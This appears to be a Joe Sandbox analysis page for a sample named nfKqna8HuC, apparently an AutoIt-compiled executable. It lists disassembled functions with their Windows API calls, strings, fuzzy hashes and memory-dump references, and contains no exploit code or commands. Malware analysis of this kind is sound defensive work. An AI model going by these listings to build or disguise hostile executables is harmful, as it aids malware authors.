Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: d0361ae578d3862cf8603e886bd68818dda00829b80281a49a85a2b4bc8c3a74
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 31017E3200014ABBCF125E84DC168EE3F23BB18356F488495FE1959131D736CAB6AB85

Function 00647452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00647A0D: __getptd_noexit.LIBCMT ref: 00647A0E

__lock.LIBCMT ref: 0064748F
InterlockedDecrement.KERNEL32(?), ref: 006474AC
_free.LIBCMT ref: 006474BF
InterlockedIncrement.KERNEL32(01271168), ref: 006474D7

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 91ff79bb28ad9143ab19f5c6efb4bf3c488137437670d8d19c553a2ea1066eea
Instruction ID: 48ab1e67793409340b580b932926b2f6a20d0bbf08be2c0910455f05eb6112e4
Opcode Fuzzy Hash: 91ff79bb28ad9143ab19f5c6efb4bf3c488137437670d8d19c553a2ea1066eea
Instruction Fuzzy Hash: DD019635D0A611DBC751AF6495057ADBBA3BF06711F16400AF414B7790CB346941CFDA

Function 0068EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0063AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0063AFE3
Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063AFF2
Part of subcall function 0063AF83: BeginPath.GDI32(?), ref: 0063B009
Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068EA8E
LineTo.GDI32(00000000,?,?), ref: 0068EA9B
EndPath.GDI32(00000000), ref: 0068EAAB
StrokePath.GDI32(00000000), ref: 0068EAB9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9d96752aa61bf665cc386e42c63769f879edd7807a78dafbd6a6f092cf9ca655
Instruction ID: 5b43e1a0be7ed853fc28da8674cec36fee59ee5fc8e8a58a8d3159a164ffba70
Opcode Fuzzy Hash: 9d96752aa61bf665cc386e42c63769f879edd7807a78dafbd6a6f092cf9ca655
Instruction Fuzzy Hash: 40F05E31005259BBDB12AF94AC09FCA3F5BAF07711F044201FA12651E187756652DB99

Function 0065C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0065C85D
GetCurrentThreadId.KERNEL32 ref: 0065C864
AttachThreadInput.USER32(00000000), ref: 0065C86B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 04f454f3c1ce767b48a7c2c865ed6f825cb0303ab7ba7f4796b2d67bd0cf0798
Instruction ID: 0feeae7f238d588de1e1b45a19f05285fbadd26e80815704514c02ff911ec93e
Opcode Fuzzy Hash: 04f454f3c1ce767b48a7c2c865ed6f825cb0303ab7ba7f4796b2d67bd0cf0798
Instruction Fuzzy Hash: D5E030711412247ADB102B61DC0DEDB7F5DEF067A1F009011B90A84850C6719585DFE0

Function 0065B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0065B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0065AC9D), ref: 0065B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0065AC9D), ref: 0065B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0065AC9D), ref: 0065B0F1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 62a1f46fa3586d374fc5173f5c3649007ae8ff2823a9eebffdbbb1db24261ee3
Instruction ID: 83f888001fd9ebc0170b174c30f1eafa698d3afd7074889c940abedf8b9d6329
Opcode Fuzzy Hash: 62a1f46fa3586d374fc5173f5c3649007ae8ff2823a9eebffdbbb1db24261ee3
Instruction Fuzzy Hash: FAE08672601211ABD7202FB15C0DF873BAAEF56792F019818F643D6080DB349406CF60

Function 0063B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0063B496
SetTextColor.GDI32(?,000000FF), ref: 0063B4A0
SetBkMode.GDI32(?,00000001), ref: 0063B4B5
GetStockObject.GDI32(00000005), ref: 0063B4BD
GetWindowDC.USER32(?,00000000), ref: 0069DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0069DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0069DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0069DE6A
GetPixel.GDI32(00000000,?,?), ref: 0069DE8A
ReleaseDC.USER32(?,00000000), ref: 0069DE95

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: d6f8ebe5d14c260b335bae9154e4a05f0d0b6680e69c604b8fb6eb15ed960909
Instruction ID: 1d6df023590888e9021fa083270c3e5a37337e2d0670d0b6ff386732676fb8ee
Opcode Fuzzy Hash: d6f8ebe5d14c260b335bae9154e4a05f0d0b6680e69c604b8fb6eb15ed960909
Instruction Fuzzy Hash: BDE06D31500240AEDF216F64AC09BD83B12AB12339F00D266F66A584E2C3714981CF21

Function 0065B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0065B2DF
UnloadUserProfile.USERENV(?,?), ref: 0065B2EB
CloseHandle.KERNEL32(?), ref: 0065B2F4
CloseHandle.KERNEL32(?), ref: 0065B2FC

Part of subcall function 0065AB24: GetProcessHeap.KERNEL32(00000000,?,0065A848), ref: 0065AB2B
Part of subcall function 0065AB24: HeapFree.KERNEL32(00000000), ref: 0065AB32

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: d9c13fb442757d195a29fe2f72baada76923fd29cd1137aa3b3890de23a0a6bb
Instruction ID: 2e66d488a40bfb67f52fc75d471d083451bff4ed7300279e1b11caa9c3c7efaf
Opcode Fuzzy Hash: d9c13fb442757d195a29fe2f72baada76923fd29cd1137aa3b3890de23a0a6bb
Instruction Fuzzy Hash: CCE0B63A104005BBCB013FA5EC08859FBA7FF8A3613109221F62681971CB32A871EF91

Function 0069B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0069B29A
GetDC.USER32(00000000), ref: 0069B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0069B2C3
ReleaseDC.USER32 ref: 0069B2E2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: a4b987fc66be230cee6235bbf3ffb71f5adddec6940708723b24484db5a0019b
Instruction ID: ccd799e41eb6307d3d15094c39ad5c1bfdb04e775ac901cd80969324ac828d11
Opcode Fuzzy Hash: a4b987fc66be230cee6235bbf3ffb71f5adddec6940708723b24484db5a0019b
Instruction Fuzzy Hash: B2E046B1500204EFDF006F70D848A2E7BAAEB4C350F12F80AFC5B8B650CB74A8418F90

Function 0069B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0069B2AE
GetDC.USER32(00000000), ref: 0069B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0069B2C3
ReleaseDC.USER32 ref: 0069B2E2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 6deeac66d231541429b6247a45ea2480d131fb33ed8c1ee5ec7debc668f4b0cf
Instruction ID: fa73e68b20663103c38b5110e96833a90ec51659da29cba61dc6f92e0d5f4375
Opcode Fuzzy Hash: 6deeac66d231541429b6247a45ea2480d131fb33ed8c1ee5ec7debc668f4b0cf
Instruction Fuzzy Hash: 5EE046B1500200EFDB006F70D84862D7BAAEB4D390F12E809F95B8B650CB78A8018F50

Function 0065DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0065DEAA

Strings

Container, xrefs: 0065DE29
AutoIt3GUI, xrefs: 0065DE22

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: e440f900708f1f1a868551126dcc911f989874c67629c3722e9ca93cea5449fc
Instruction ID: f7fa10b4b42eb941c1e1f6f2eee2df08a6a98dd0ff36b1950543f40137ab3265
Opcode Fuzzy Hash: e440f900708f1f1a868551126dcc911f989874c67629c3722e9ca93cea5449fc
Instruction Fuzzy Hash: 5A913770600602AFDB64DF64C884A6ABBF6BF49711F10856EF84ACB791DB71E845CB60

Function 0066290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00662A72

Strings

I/i, xrefs: 006629FC, 00662A64, 00662A12
I/i, xrefs: 0066297F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscpy
String ID: I/i$I/i
API String ID: 3048848545-1481515708
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: 0a652ab06750451fcc3c3dacc58035c7b25868f424554d921f39ce7e9ec73be8
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: B5410835900A17AACF25DFD9D4619FDB772EF48320F50504EF881A7295DB706E82C7A4

Function 0063BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0063BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0063BCF3

Strings

@, xrefs: 0063BCE8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: eca7eafaa49fa587fc432bf992761cb28550387906e3ced97332237c3f86aea7
Instruction ID: 17b08716acb2dbc3f9ca8a35d615468e86a3364ed5472e893049f15340448087
Opcode Fuzzy Hash: eca7eafaa49fa587fc432bf992761cb28550387906e3ced97332237c3f86aea7
Instruction Fuzzy Hash: A45144714087469BE360AF14DC96BAFBBECFF94354F41484EF1C8810A2DB7085A88B96

Function 0066C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 006244ED: __fread_nolock.LIBCMT ref: 0062450B

_wcscmp.LIBCMT ref: 0066C65D
_wcscmp.LIBCMT ref: 0066C670

Strings

FILE, xrefs: 0066C5A5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 91e9a537d859e56ea325b7d1624e90f598bb94b748937b37b6f807d100f19127
Instruction ID: 6e38fd8f9d83d182cf8fa372954a3e6df17f0c218b7c08d225489439ad3d8244
Opcode Fuzzy Hash: 91e9a537d859e56ea325b7d1624e90f598bb94b748937b37b6f807d100f19127
Instruction Fuzzy Hash: EB41D672A0061ABADF60ABA4DC81FEF77FADF49714F000069F605EB181DA709A048B65

Function 0068A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0068A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0068A86F

Strings

', xrefs: 0068A7C3

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8446fceb61b4a8045cb6f7ed4bd1c998e05e13e7a3ea41deda6a8341d0e68269
Instruction ID: 4b866547f1ef1ac5ae4ba5e97c67e82aaa0251065eb68b2e1d2c3fe88b781e94
Opcode Fuzzy Hash: 8446fceb61b4a8045cb6f7ed4bd1c998e05e13e7a3ea41deda6a8341d0e68269
Instruction Fuzzy Hash: 9941FA78E013099FEB54DFA4D881BDA7BBAFB09300F14116AED05AB341D770A942DFA1

Function 0068975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0068980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0068984A

Strings

static, xrefs: 006897AA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: efc767be8f9f335e3797b981cb29d76f1095b32fd2dcdf51aa03dd1b9b5ab072
Instruction ID: 4604be4be99f5c8b9a980a959109d73583b1e3f1701a9d56c68f41aaec896ead
Opcode Fuzzy Hash: efc767be8f9f335e3797b981cb29d76f1095b32fd2dcdf51aa03dd1b9b5ab072
Instruction Fuzzy Hash: 11318F71510605AEEB10AF74CC80BFB73AAFF59764F04961DF9A9C7290CA31AC81DB64

Function 00665157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006651C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00665201

Strings

0, xrefs: 006651BF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 0d12b19b0c2beb078282a8f4aa6027d72f720cd541ea9cc5f04a0436a2879082
Instruction ID: 160eae411ee6f7da9220a068e82c995c57a3b8d025d32287a27df6c9d64aa000
Opcode Fuzzy Hash: 0d12b19b0c2beb078282a8f4aa6027d72f720cd541ea9cc5f04a0436a2879082
Instruction Fuzzy Hash: C631A271A007059BEB24CF99D896BEEBBFAFF45350F14401DE987A62A0E7709B44CB50

Function 0067658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00676608

Strings

, $, xrefs: 00676648
AUTOITCALLVARIABLE%d, xrefs: 006765FA

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 2dda394e61db1589a1fd6ad69e23520c51465d68d20cbe6d0071f739e1247877
Instruction ID: 8aa5b8e4b0c5ecd79a83ea0ad7bd3def4b61b15bb87d70e54e7c405e6d55d3ce
Opcode Fuzzy Hash: 2dda394e61db1589a1fd6ad69e23520c51465d68d20cbe6d0071f739e1247877
Instruction Fuzzy Hash: C221BF71A00528ABCF50EF64D882EED77B6AF05740F40406DF405AB281DB70EA45CFAA

Function 006893CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0068945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00689467

Strings

Combobox, xrefs: 00689429

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 94df7183ba06b7f0547760ce85ef31242e1a9f5f8ccab426edd5a059ebf4ad9c
Instruction ID: 2e383615132754ba9cd6e3fc1986ef3fa3f6c8fa098b5b25c81e9d3cd62dc6ec
Opcode Fuzzy Hash: 94df7183ba06b7f0547760ce85ef31242e1a9f5f8ccab426edd5a059ebf4ad9c
Instruction Fuzzy Hash: 9B1160713102097FEF21AE54DC80EFB37ABEB993A4F144229F9199B290D6719C528B70

Function 0068DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

GetActiveWindow.USER32 ref: 0068DA7B
EnumChildWindows.USER32(?,0068D75F,00000000), ref: 0068DAF5

Strings

T1g, xrefs: 0068DAFB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
